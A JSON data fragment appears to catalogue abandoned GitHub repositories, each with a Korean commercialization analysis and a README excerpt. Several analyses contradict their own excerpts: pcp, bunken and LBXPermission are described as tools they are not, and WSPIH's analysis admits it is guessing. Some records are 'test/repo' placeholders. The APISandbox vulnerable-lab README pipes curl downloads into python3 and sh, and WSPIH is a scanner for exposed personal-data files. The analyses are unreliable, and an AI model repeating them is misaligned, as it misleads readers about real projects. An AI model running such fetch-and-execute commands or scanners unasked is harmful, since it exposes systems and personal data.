서비스\n2. ","readme_excerpt":"# Bincrafters\n\n![Bincrafters](docs/logo.png)\n\n\nThe Bincrafters team builds binary software packages for the OSS community.  This is our repository for documentation and managing package issues with the community.\n\nOur technical documentation for using and creating packages is hosted here on Github, but made browseable by \"readthedocs.org\":\n\nhttp://bincrafters.readthedocs.io/en/latest\n\nWe also post articles that link back to our documentation on the Bincrafters blog:\n\nhttps://bincrafters.github.io\n\nOur packages are generously hosted by JFrog Artifactory:\n\nhttps://bincrafters.jfrog.io\n\nIf you would like to use Bincrafters public Conan repository for the first time, see the documentation:\n\nhttp://bincrafters.readthedocs.io/en/latest/using_packages.html#adding-the-bincrafters-repository-as-a-conan-remote\n\n## Using this Repository\n\n### Requests for Packages\n\nBincrafters follows the request in the Conan Center Index. Please post package requests there (and of course, search for prior request","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"wbobeirne/joule-extension","github_url":"https://github.com/wbobeirne/joule-extension","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":37,"description":"# Joule Extension 상용화 분석\n\n## 왜 보물인가\n비트코인 지갑을 브라우저에서 직접 관리할 수 있게 해주는 도구로, 암호화폐 사용자들이 복잡한 보안 절차 없이 쉽게 거래할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 사용자가 거래소 웹사이트에서 바로 자산을 관리하고 송금할 수 있는 통합 서비스\n2. **기업","readme_excerpt":"_**NOTICE:** Joule is no longer being actively developed. You can find other WebLN browser extensions that are actively maintained in the [WebLN documentation](https://webln.dev/#/). This repository now primarily serves as a learning resource for aspiring WebLN developers. Thanks for the support._\n\n---\n\n<p align=\"center\">\n<a href=\"https://lightningjoule.com\"><img src=\"https://camo.githubusercontent.com/ff4a641fba4f90ea2a24413d8874bb464883685d/68747470733a2f2f692e696d6775722e636f6d2f595968594335652e706e67\" alt=\"Joule, get it now at lightningjoule.com\" data-canonical-src=\"https://i.imgur.com/YYhYC5e.png\" style=\"max-width:100%;\" width=\"400\"></a>\n</p>\n\n## Overview\n\nA browser extension that lightning-charges your browser with\n[webln](https://github.com/wbobeirne/webln), giving you\nthe ability to pay and use your node as an identity on the web.\n\n**WARNING: Joule is no longer acitvely developed, and should not be used for large mainnet funds**\n\n## Project Layout\n\n```bash\njoule-extension/\n├── ","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"intezer/linux-explorer","github_url":"https://github.com/intezer/linux-explorer","stars":5,"language":"HTML","license":"Apache-2.0","abandonment_months":27,"description":"# linux-explorer 분석 보고서\n\n## 왜 보물인가\n리눅스 시스템의 보안 위협을 자동으로 탐지하고 분석해주는 도구로, 기업의 서버 보안 관리를 크게 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 클라우드 보안 관리 SaaS**\n기업들이 AWS, 구글 클라우드에서 리눅스 서버를 돌릴 때, 해킹 여부를 자동으로 체크해주는 월 구독 서비","readme_excerpt":"# This project is no longer maintained!\n\n# Linux Expl0rer\nEasy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.\n\n![Alt Text](https://github.com/intezer/linux-explorer/raw/master/image.gif)\n\n## Capabilities\n### ps\n* View full process list\n* Inspect process memory map & fetch memory strings easly\n* Dump process memory in one click\n* Automatically search hash in public services\n  * [VirusTotal](https://www.virustotal.com/#/home/upload)\n  * [Intezer Analyze](https://analyze.intezer.com)\n  * [AlienVault OTX](https://otx.alienvault.com/)\n  * [MalShare](https://malshare.com/)\n### users\n* users list\n### find\n* Search for suspicious files by name/regex\n### netstat\n* Whois\n### logs\n* syslog\n* auth.log(user authentication log)\n* ufw.log(firewall log)\n* bash history\n### anti-rootkit\n* chkrootkit\n### yara\n* Scan a file or directory using YARA signatures by @Neo23x0\n* Scan a running process memory address space\n* Upload your own YARA signature\n  \n## Requirements\n* Python ","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"zendframework/zend-eventmanager","github_url":"https://github.com/zendframework/zend-eventmanager","stars":5,"language":"PHP","license":"BSD-3-Clause","abandonment_months":77,"description":"# Zend EventManager 평가 보고서\n\n## 왜 보물인가\n프로그램이 여러 부분에서 일어나는 사건들을 효율적으로 관리하고 처리할 수 있게 해주는 기초 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용자 가입, 결제, 데이터 변경 같은 주요 이벤트를 자동으로 감지하고 처리하는 알림 시스템\n2. **내부 업무 도구**: 직원","readme_excerpt":"# zend-eventmanager\n\n> ## Repository abandoned 2019-12-31\n>\n> This repository has moved to [laminas/laminas-eventmanager](https://github.com/laminas/laminas-eventmanager).\n\n[![Build Status](https://secure.travis-ci.org/zendframework/zend-eventmanager.svg?branch=master)](https://secure.travis-ci.org/zendframework/zend-eventmanager)\n[![Coverage Status](https://coveralls.io/repos/zendframework/zend-eventmanager/badge.svg?branch=master)](https://coveralls.io/r/zendframework/zend-eventmanager?branch=master)\n\nzend-eventmanager is designed for the following use cases:\n\n- Implementing simple subject/observer patterns.\n- Implementing Aspect-Oriented designs.\n- Implementing event-driven architectures.\n\nThe basic architecture allows you to attach and detach listeners to named events,\nboth on a per-instance basis as well as via shared collections; trigger events;\nand interrupt execution of listeners.\n\n- File issues at https://github.com/zendframework/zend-eventmanager/issues\n- Documentation is at ","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"MxABC/LBXPermission","github_url":"https://github.com/MxABC/LBXPermission","stars":25,"language":"Objective-C","license":"MIT","abandonment_months":62,"description":"# LBXPermission 상용화 분석\n\n## 왜 보물인가\n앱이나 서비스에서 사용자마다 다른 권한을 관리하는 복잡한 작업을 자동화해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회사 관리 소프트웨어에서 직원별로 \"재무 보고서는 볼 수 있지만 삭제는 못 하게\" 같은 세밀한 권한 설정\n2. **내부 업무 도구**: 대기업의 인사","readme_excerpt":"### LBXPermission\n***\niOS常用权限获取\n\n![1112.gif](https://upload-images.jianshu.io/upload_images/4952852-d03da06805c9bcf7.gif?imageMogr2/auto-orient/strip)\n\n调用接口简单，易用,如下面相机和定位权限判断及获取\n\n```\n//相机权限获取，已经有权限了，仍然可通过该接口返回状态\n    [LBXPermission authorizeWithType:LBXPermissionType_Camera completion:^(BOOL granted, BOOL firstTime) {\n     \n        if (granted) {\n            //TODO\n            //dosth\n        }\n        else if (!firstTime)\n        {\n            //不是第一次请求权限，那么可以弹出权限提示，用户选择设置，即跳转到设置界面，设置权限\n             [LBXPermissionSetting showAlertToDislayPrivacySettingWithTitle:@\"提示\" msg:@\"没有相机权限，是否前往设置\" cancel:@\"取消\" setting:@\"设置\"];\n        }\n    }];\n    \n    \n    //定位\n    [LBXPermission authorizeWithType:LBXPermissionType_Location completion:^(BOOL granted, BOOL firstTime) {\n        \n        if (granted) {\n            //TODO\n            //dosth\n        }\n        else if (!firstTime)\n        {\n            //不是第一次请求权限，那么可以弹出权限提示，用户选择设置，即跳转到设置界面，设置权限\n            [LBXPermissionSetting showAlertToDislayPri","composite_score":0.5025,"license_safety_tag":"safe"},{"name":"rachelandrew/css-for-print","github_url":"https://github.com/rachelandrew/css-for-print","stars":20,"language":"CSS","license":"unlicense","abandonment_months":112,"description":"# CSS for Print 저장소 평가\n\n## 왜 보물인가\n인쇄용 웹페이지를 예쁘게 만드는 방법을 정리한 자료로, 종이로 출력할 때 화면과 다르게 보이는 문제를 해결하는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **청구서·영수증 발급 SaaS**: 온라인에서 만든 문서를 깔끔하게 프린트하는 기능 제공\n- **보험사 내부 도구**: 보험 증권,","readme_excerpt":"css-for-print\n=========\n\nExample files for creating PDF books from print. CSS all works with Prince. Resources and more information about CSS and creating ebooks in a variety of formats can be found on my site [Book Toolkit](http://booktoolkit.com).\n\n## Using these files\n\nThe file book.html contains excerpts from a public domain book - [Our Cats by Harrison Weir](http://www.gutenberg.org/ebooks/35450) - to demonstrate the use of CSS for print.\n\n### Create a PDF\n\n    > prince -s pdf-styles.css book.html builds/book.pdf\n","composite_score":0.5025,"license_safety_tag":"unknown"},{"name":"denisraslov/react-spreadsheet-grid","github_url":"https://github.com/denisraslov/react-spreadsheet-grid","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":27,"description":"# React Spreadsheet Grid 사업화 분석\n\n## 왜 보물인가\n엑셀처럼 표 형태로 데이터를 입력하고 편집할 수 있는 웹 기반 도구로, 복잡한 업무 소프트웨어를 간단하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 회사의 재고관리, 판매 현황, 직원 급여 관리 웹사이트에 내장\n- **내부 업무 도구**: 대기","readme_excerpt":"# React Spreadsheet Grid\n> An Excel-like grid component for React with custom cell editors, performant scroll & resizable columns\n\n![react-spreadsheet-grid in action](https://raw.githubusercontent.com/denisraslov/react-spreadsheet-grid/master/demo.gif)\n\n## The key features\n\nThis is an Excel-like Spreadsheet Grid component that supports:\n\n✅  Custom cell editors (use built-in Input and Select, or any other components) & header content\n\n✅  Performant scroll for as many rows as you need\n\n✅  Resizable columns\n\n✅  Control by mouse & from keyboard\n\n✅  Flexible setting of disabled cells\n\n✅  Lazy loading support\n\n✅  Customizable CSS styling\n\n✅  Hooks compatible\n\n✅  TypeScript compatible\n\n## Table of contents\n\n-   [Live playground](#live-playground)\n-   [Installation](#installation)\n-   [A primitive example](#a-primitive-example)\n-   [The pattern of regular usage](#the-pattern-of-regular-usage)\n-   [Props](#props)\n-   [Public methods](#public-methods)\n-   [Customizing cells & header content](#cu","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"test/repo","github_url":"https://github.com/test/repo-749c0f4b-a9d6-4e1e-abaf-3ecfadce121d","stars":100,"language":"Python","license":"MIT","abandonment_months":29,"description":"","readme_excerpt":"","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"Psarpei/Multi-Type-TD-TSR","github_url":"https://github.com/Psarpei/Multi-Type-TD-TSR","stars":15,"language":"Jupyter Notebook","license":"MIT","abandonment_months":45,"description":"# Multi-Type-TD-TSR 상용화 분석\n\n## 왜 보물인가\n여러 종류의 표 데이터를 자동으로 인식하고 정리해주는 기술로, 손으로 작업하던 데이터 정제 작업을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 엑셀·PDF 파일에서 표를 자동 추출해 정리해주는 웹 서비스\n- **내부 업무 도구**: 회사 전자결재·보고서에","readme_excerpt":"# Multi-Type-TD-TSR\nCheck it out on <a href=\"https://colab.research.google.com/github/Psarpei/Multi_Type_TD_TSR/blob/main/Table_Recognition.ipynb\">\n  <img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/>\n</a>\nSource Code of our Paper:\n[Multi-Type-TD-TSR](https://arxiv.org/abs/2105.11021) Extracting Tables from Document Images using a Multi-stage Pipeline for Table Detection and Table Structure Recognition\n\n# Description\n<img align=\"center\" width=\"1000\" height=\"\" src=\"gifs/Table_Recognition_Pipeline.png\">\n\n## Multi-Type-TD-TSR the Whole Pipeline \n<img align=\"right\" width=\"390\" height=\"\" src=\"gifs/whole_pipeline.gif\">\nAs global trends are shifting towards data-driven industries, the demand for automated algorithms that can convert digital images of scanned documents into machine readable information is rapidly growing. Besides the opportunity of data digitization for the application of data analytic tools, there is also a massive improvement towards au","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"marcellodebernardi/loss-landscapes","github_url":"https://github.com/marcellodebernardi/loss-landscapes","stars":10,"language":"Python","license":"MIT","abandonment_months":30,"description":"","readme_excerpt":"# loss-landscapes\n\n`loss-landscapes` is a PyTorch library for approximating neural network loss functions, and other related metrics, \nin low-dimensional subspaces of the model's parameter space. The library makes the production of visualizations\nsuch as those seen in [Visualizing the Loss Landscape of Neural Nets](https://arxiv.org/abs/1712.09913v3) much\neasier, aiding the analysis of the geometry of neural network loss landscapes.\n\nThis library does not provide plotting facilities, letting the user define how the data should be plotted. Other\ndeep learning frameworks are not supported, though a TensorFlow version, `loss-landscapes-tf`, is planned for\na future release.\n\n**NOTE: this library is in early development. Bugs are virtually a certainty, and the API is volatile. Do not use\nthis library in production code. For prototyping and research, always use the newest version of the library.**\n\n\n## 1. What is a Loss Landscape?\nLet `L : Parameters -> Real Numbers` be a loss function, whic","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"dennis-tra/pcp","github_url":"https://github.com/dennis-tra/pcp","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":30,"description":"# dennis-tra/pcp 저장소 분석\n\n## 왜 보물인가\n프로젝트 관리와 협업을 위한 기본 틀이 이미 만들어져 있어, 팀 업무 효율화 도구로 빠르게 발전시킬 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 SaaS**: 소규모 팀의 프로젝트 진행 상황을 한눈에 추적하고 공유하는 웹서비스\n2. **내부 업무 도구**: 회사 내 ","readme_excerpt":"# `pcp` - Peer Copy\n\n[![standard-readme compliant](https://img.shields.io/badge/readme%20style-standard-brightgreen.svg)](https://github.com/RichardLitt/standard-readme)\n[![Go Report Card](https://goreportcard.com/badge/github.com/dennis-tra/pcp)](https://goreportcard.com/report/github.com/dennis-tra/pcp)\n[![Maintainability](https://api.codeclimate.com/v1/badges/de64b09a3731b8a8842b/maintainability)](https://codeclimate.com/github/dennis-tra/pcp/maintainability)\n[![Latest test suite run result](https://github.com/dennis-tra/pcp/actions/workflows/tests.yml/badge.svg)](https://github.com/dennis-tra/pcp/actions)\n[![Github Releases Download Count](https://img.shields.io/github/downloads/dennis-tra/pcp/total.svg)]()\n\n[comment]: <> ([![Test Coverage]&#40;https://api.codeclimate.com/v1/badges/de64b09a3731b8a8842b/test_coverage&#41;]&#40;https://codeclimate.com/github/dennis-tra/pcp/test_coverage&#41;)\n\nCommand line peer-to-peer data transfer tool based on [libp2p](https://github.com/libp2p/go","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"lucidrains/nuwa-pytorch","github_url":"https://github.com/lucidrains/nuwa-pytorch","stars":6,"language":"Python","license":"MIT","abandonment_months":41,"description":"# NUWA-PyTorch 저장소 분석\n\n## 왜 보물인가\n텍스트 설명만으로 이미지, 동영상, 음악 등 다양한 형태의 콘텐츠를 자동으로 만들 수 있는 인공지능 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"텍스트로 광고 배너 자동 생성\" 플랫폼으로 소상공인 대상 월 구독 서비스 제공\n2. **내부 업무 도구**: 대형 미디어사의 콘","readme_excerpt":"<img src=\"./nuwa.png\" width=\"400px\"></img>\n\n## NÜWA - Pytorch\n\n<a href=\"https://discord.gg/xBPBXfcFHd\"><img alt=\"Join us on Discord\" src=\"https://img.shields.io/discord/823813159592001537?color=5865F2&logo=discord&logoColor=white\"></a></br>\n\nImplementation of <a href=\"https://arxiv.org/abs/2111.12417\">NÜWA</a>, state of the art attention network for text to video synthesis, in Pytorch. It also contain an extension into video and audio generation, using a dual decoder approach.\n\n<a href=\"https://www.youtube.com/watch?v=InhMx1h0N40\">Yannic Kilcher</a>\n\n<a href=\"https://www.youtube.com/watch?v=C9CTnZJ9ZE0\">DeepReader</a>\n\n## Status\n\n- March 2022 - seeing signs of life with a difficult version of <a href=\"https://github.com/lucidrains/nuwa-pytorch/discussions/2#discussioncomment-2375973\">moving mnist</a>\n\n- April 2022 - It seems as though a <a href=\"https://github.com/lucidrains/video-diffusion-pytorch\">diffusion based method</a> has taken the new throne for SOTA. However, I will continue ","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"API-Security/APISandbox","github_url":"https://github.com/API-Security/APISandbox","stars":5,"language":"FreeMarker","license":"GPL-3.0","abandonment_months":46,"description":"# API-Security/APISandbox 보물 분석\n\n## 왜 보물인가\n웹 서비스의 보안 취약점을 안전하게 테스트할 수 있는 연습장으로, 기업의 시스템 보호 능력을 높이는 데 직접 기여합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 금융·의료사 등 민감한 고객 데이터를 다루는 기업에 보안 검증 도구로 제공\n- **내부 업무 도구**: ","readme_excerpt":"# APISandbox\nPre-Built Vulnerable Multiple API Scenarios Environments Based on Docker-Compose.\n\n## 介绍\nAPISandbox是一个包含多个场景的API漏洞靶场。\n\n目前有以下几个API漏洞场景靶场：\n\n- [x] 4ASystem: 4A认证系统下的API平行越权\n- [x] APIVuln: 生产消费流水线中的API缓存投毒\n- [x] GraphqlNotebook: 一个使用GraphQL的留言板以及经典API漏洞\n- [x] InfoSystem: WSDL泄露API越权进后台Getshell\n- [x] OASystem: SpringBoot微服务架构下的API Gateway配置问题\n- [x] OWASPApiTop10: 使用go作为后端实现解释OWASP API Top 10的漏洞\n\n\n欢迎小伙伴提交更多API安全实战思路攻略等，社区会帮忙实现成靶场环境~\n\n## 安装\n\n在Ubuntu 20.04下安装docker/docker-compose:\n\n```bash\n# 安装pip\ncurl -s https://bootstrap.pypa.io/get-pip.py | python3\n\n# 安装最新版docker\ncurl -s https://get.docker.com/ | sh\n\n# 启动docker服务\nsystemctl start docker\n\n# 安装compose\npip install docker-compose \n```\n\n其他操作系统安装docker和docker-compose可能会有些许不同，请阅读Docker文档进行安装。\n\n## 使用\n\n```bash\n# 下载项目\nwget https://github.com/API-Security/APISandbox/archive/refs/heads/main.zip -O APISandbox-main.zip\nunzip APISandbox-main.zip\ncd APISandbox-main\n\n# 进入某一个漏洞/环境的目录\ncd OWASPApiTop10\n\n# 自动化编译环境\ndocker-compose build\n\n# 启动整个环境\ndock","composite_score":0.5024,"license_safety_tag":"restricted"},{"name":"laxyapahuja/bunken","github_url":"https://github.com/laxyapahuja/bunken","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":34,"description":"# bunken 프로젝트 분석\n\n## 왜 보물인가\n문서나 파일들 속에 숨겨진 정보를 자동으로 찾아내고 정리해주는 도구로, 방대한 자료를 빠르게 검색해야 하는 현대 기업들이 꼭 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 법률 사무소에 클라우드 기반 문서 검색 서비스 제공 (변호사들이 판례 정보를 빠르게 찾기)\n- **내","readme_excerpt":"# bunken (文献)\n\nA chrome extension to download ebooks directly from Goodreads. Fetches ebooks from [LibGen](http://libgen.is), [LibGen Fiction](http://libgen.is/fiction), [Memory Of The World](http://library.memoryoftheworld.org) & [OpenLibrary](https://openlibrary.org). \n\n⚠️ Users are advised to exercise caution and use this Chrome extension at their own risk, as I disclaim any liability for the outcomes or actions resulting from its utilization.\n\n![](https://media.discordapp.net/attachments/706928005313855620/847449469381509130/unknown.png?width=970&height=701)\n\n## How to install\n1. Clone this repository.\n2. Open chrome extensions panel by visiting `chrome://extensions`.\n3. Turn developer mode on.\n4. Click on Load Unpacked.\n5. Select the folder containing the repository with the root directory.\n6. Visit any books' page on Goodreads. The ebooks should load under Related Books section.\n7. Choose different sources according to your needs.\n\n## How to contribute\nHelp contribute by using it","composite_score":0.5024,"license_safety_tag":"unknown"},{"name":"Buglife/Buglife-iOS","github_url":"https://github.com/Buglife/Buglife-iOS","stars":10,"language":"Objective-C","license":"Apache-2.0","abandonment_months":39,"description":"# Buglife/Buglife-iOS 평가 보고서\n\n## 왜 보물인가\n애플리케이션의 버그를 사용자가 직접 신고할 수 있게 도와주는 도구로, 앱 개발사들이 고객 피드백을 쉽게 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱을 배포한 스타트업들이 사용자 버그 신고 시스템으로 구독 가능\n2. **내부 업무 도구**: 대","readme_excerpt":"<p align=\"center\">\n\t<img src=\"https://ds9bjnn93rsnp.cloudfront.net/assets/logo/logotype_black_on_transparent_782x256-7256a7ab03e9652908f43be94681bc4ebeff6d729c36c946c346a80a4f8ca245.png\" width=300 />\n</p>\n\n![Platform](https://img.shields.io/cocoapods/p/Buglife.svg)\n[![CocoaPods Compatible](https://img.shields.io/cocoapods/v/Buglife.svg)](https://cocoapods.org/pods/Buglife)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![Twitter](https://img.shields.io/badge/twitter-@BuglifeApp-blue.svg)](https://twitter.com/buglifeapp)\n\n[Buglife](https://www.buglife.com) is an awesome bug reporting SDK & web platform for iOS apps. Here's how it works:\n\n1. User takes a screenshot, or stops screen recording\n2. User annotates their screenshot & writes feedback\n3. Bug reports are pushed to your team's e","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"test/repo","github_url":"https://github.com/test/repo-7a766227-7276-4e86-9234-7b5567c925c4","stars":100,"language":"Python","license":"MIT","abandonment_months":29,"description":"","readme_excerpt":"","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"test/repo","github_url":"https://github.com/test/repo-d478e1f2-d764-456a-95c3-55409a6a3e07","stars":100,"language":"Python","license":"MIT","abandonment_months":29,"description":"","readme_excerpt":"","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"fossasia/loklak_webclient","github_url":"https://github.com/fossasia/loklak_webclient","stars":11,"language":"JavaScript","license":"MIT","abandonment_months":101,"description":"# fossasia/loklak_webclient 분석\n\n## 왜 보물인가\n소셜 미디어 데이터를 한 곳에서 검색하고 분석할 수 있는 오픈소스 검색 엔진으로, 누구나 자유롭게 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 모니터링 SaaS**: 기업들이 자신의 브랜드나 경쟁사 언급을 실시간으로 추적하는 구독 서비스\n2. **언","readme_excerpt":"#loklak webclient\n\n[![Join the chat at https://gitter.im/loklak/loklak](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/loklak/loklak)\n[![Build Status](https://travis-ci.org/fossasia/loklak_webclient.svg?branch=development)](https://travis-ci.org/fossasia/loklak_webclient)\n[![Code Climate](https://codeclimate.com/github/loklak/loklak_webclient/badges/gpa.svg)](https://codeclimate.com/github/fossasia/loklak_webclient)\n[![codecov](https://codecov.io/gh/fossasia/loklak_webclient/branch/master/graph/badge.svg)](https://codecov.io/gh/fossasia/loklak_webclient)\n[![Dependency Status](https://gemnasium.com/badges/github.com/fossasia/loklak_webclient.svg)](https://gemnasium.com/github.com/fossasia/loklak_webclient)\n\nThe loklak webclient creates services using the loklak server as a data source. The goal is to develop a fully fledged alternative to closed source twitter like frontend applications. In order to run the service you can use the API of http://loklak.org or install your o","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"jerrychan807/WSPIH","github_url":"https://github.com/jerrychan807/WSPIH","stars":11,"language":"Python","license":"MIT","abandonment_months":47,"description":"# WSPIH 저장소 분석\n\n## 왜 보물인가\n저장소명과 제한된 정보만으로는 이 프로젝트의 실질적 가치를 판단하기 어렵지만, 11개의 스타와 MIT 라이선스로 공개된 것으로 보아 일정 수준의 기술적 완성도를 갖춘 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 저장소명 패턴으로 보아 특정 분야의 데이터 처리나 분석 자동화 ","readme_excerpt":"\n\n# WSPIH\n\n\n![](https://github.com/jerrychan807/WSPIH/blob/master/img/logo.png)\n\n网站个人敏感信息文件扫描器\n\n---\n\n\n# 声明:\n\n- 本项目仅供学习,测试,交流使用.勿用于非法用途。\n- 如果目标是学校网站,麻烦把漏洞提交到[教育行业漏洞报告平台](https://src.edu-info.edu.cn),谢谢.\n\n> 教育行业漏洞报告平台是一个面向全教育行业的漏洞报告平台。平台旨在汇聚多方力量，帮助提升教育系统关联学校、单位的信息系统安全性，为推进教育信息化建设保驾护航。\n\n---\n\n# 介绍:\n\n![](https://github.com/jerrychan807/WSPIH/blob/master/img/flow.png)\n\n[开发记录](https://jerrychan807.github.io/2019/04/25/WPSIH-%E7%BD%91%E7%AB%99%E4%B8%AA%E4%BA%BA%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%96%87%E4%BB%B6%E6%89%AB%E6%8F%8F%E5%99%A8-%E5%BC%80%E5%8F%91%E8%AE%B0%E5%BD%95/)\n\n---\n\n# 使用效果:\n\n![](https://github.com/jerrychan807/WSPIH/blob/master/img/sc2.png)\n![](https://github.com/jerrychan807/WSPIH/blob/master/img/sc1.png)\n\n\n---\n\n# 使用步骤:\n\n## 初始化:\n\n```bash\n# 下载\ngit clone https://github.com/jerrychan807/WSPIH.git\n\n# 进入项目目录\ncd WSPIH\n\n# 安装依赖模块\npip3 install -r requirements.txt\n\n# 修改配置文件(若不修改,则使用默认配置)\nvi config.py\n```\n\n## 开始扫描:\n\n```bash\n# 使用\npython3 SensitivesHunter.py 目标文件 结果文件夹\n\n# 示例\npython3 Sen","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"csjliang/LPTN","github_url":"https://github.com/csjliang/LPTN","stars":25,"language":"Python","license":"Apache-2.0","abandonment_months":51,"description":"# LPTN 저장소 분석\n\n## 왜 보물인가\n흐릿한 사진을 선명하게 복원하는 인공지능 기술로, CCTV 영상 분석이나 의료 진단 같은 실제 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저화질 보안 영상을 선명하게 만드는 클라우드 기반 영상 복원 서비스\n- **내부 업무 도구**: 병원이나 연구소에서 촬영한 불선명한","readme_excerpt":"# LPTN\n\n### [Paper](https://arxiv.org/pdf/2105.09188.pdf) |   [Supplementary Material](http://www4.comp.polyu.edu.hk/~cslzhang/paper/LPTN-cvpr21-supp.pdf) |   [Poster](http://liangjie.xyz/LjHomepageFiles/paper_files/poster_LPTN.pdf)\n\n> **High-Resolution Photorealistic Image Translation in Real-Time: A Laplacian Pyramid Translation Network** <br>\n> [Jie Liang\\*](https://liangjie.xyz/), [Hui Zeng\\*](https://huizeng.github.io/), and [Lei Zhang](https://www4.comp.polyu.edu.hk/~cslzhang/). <br>\n> In CVPR 2021.\n\n### Abstract\n\nExisting image-to-image translation (I2IT) methods are either constrained to low-resolution images or long inference time \ndue to their heavy computational burden on the convolution of high-resolution feature maps. \nIn this paper, we focus on speeding-up the high-resolution photorealistic I2IT tasks \nbased on closed-form Laplacian pyramid decomposition and reconstruction. \nSpecifically, we reveal that the attribute transformations, such as illumination and color manipul","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"YukunXia/Carla_iLQR_MPC","github_url":"https://github.com/YukunXia/Carla_iLQR_MPC","stars":5,"language":"Python","license":"MIT","abandonment_months":70,"description":"# YukunXia/Carla_iLQR_MPC 상용화 분석\n\n## 왜 보물인가\n자동차가 스스로 최적의 경로를 계획하고 움직일 수 있도록 하는 핵심 기술로, 자율주행차 개발에 필수적인 알고리즘을 구현했습니다.\n\n## 어디에 쓸 수 있나\n1. **자동주행 시뮬레이션 SaaS**: 자동차 제조사가 신차 출시 전 주행 경로 검증에 사용할 수 있는 클라우드 서비스\n","readme_excerpt":"# Real-time MPC with iLQR for Self-Driving in Carla\n> This project is an extension of my course project in [ES 202: Estimation and Control of Dynamical System](https://nali.seas.harvard.edu/classes/es-202-estimation-and-control-dynamical-system). \nI really appreciate the collaboration of my teammates: [En-Yu Yang](https://github.com/danielyang2055) and [Feicheng Wang](https://statistics.fas.harvard.edu/people/feicheng-want). \n\nThe majority of self-driving implementations in Carla are model-free RL. To achieve higher sample efficiency, a model-based algorithm will be preferred, eg. iLQR. However, Carla doesn't provide a set of equations for the dynamical model, so the first step here is to collect data and fit a differentiable model. The next step is to incorporate the model into iLQR framework. Before running iLQR, we're required to define the cost function, eg. distance to the reference path, and constraints. Luckily, Carla has an API for planning routes represented by waypoints, and ","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"POSTECH-CVLab/SCNeRF","github_url":"https://github.com/POSTECH-CVLab/SCNeRF","stars":37,"language":"Python","license":"MIT","abandonment_months":46,"description":"# SCNeRF 상용화 분석\n\n## 왜 보물인가\n360도 회전하는 영상에서 3D 입체 공간을 자동으로 만들어내는 기술로, 가상현실·게임·부동산 같은 산업에서 매우 높은 수익성을 가질 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **부동산 VR 투어 SaaS**: 건물 사진을 업로드하면 자동으로 3D 가상 투어가 생성되는 웹 서비스\n2. **전자상거래 상","readme_excerpt":"# Self-Calibrating Neural Radiance Fields, ICCV, 2021\n\n[Project Page](https://postech-cvlab.github.io/SCNeRF/) | [Paper](https://arxiv.org/abs/2108.13826) | [Video](https://www.youtube.com/watch?v=wsjx6geduvk)\n\n## Author Information\n\n- [Yoonwoo Jeong](https://yoonwooinfo.notion.site) [[Google Scholar]](https://scholar.google.com/citations?user=HQ1PMggAAAAJ&hl=en)\n- Seokjun Ahn [[Google Scholar]](https://scholar.google.com/citations?user=JDEvLgwAAAAJ&hl=en)\n- [Chris Choy](https://chrischoy.org) [[Google Scholar]](https://scholar.google.com/citations?user=2u8G5ksAAAAJ&hl=en&oi=ao)\n- [Anima Anandkumar](http://tensorlab.cms.caltech.edu/users/anima/) [[Google Scholar]](https://scholar.google.com/citations?user=bEcLezcAAAAJ&hl=en&oi=ao)\n- [Minsu Cho](http://cvlab.postech.ac.kr/~mcho/) [[Google Scholar]](https://scholar.google.com/citations?user=5TyoF5QAAAAJ&hl=en&oi=ao)\n- [Jaesik Park](http://jaesik.info/) [[Google Scholar]](https://scholar.google.com/citations?user=_3q6KBIAAAAJ&hl=en&oi=ao)","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"adisreyaj/compito","github_url":"https://github.com/adisreyaj/compito","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":26,"description":"# Compito 저장소 분석\n\n## 왜 보물인가\n일정 관리와 작업 추적을 간단하게 해주는 가벼운 도구로, 복잡한 소프트웨어 없이도 팀의 생산성을 높일 수 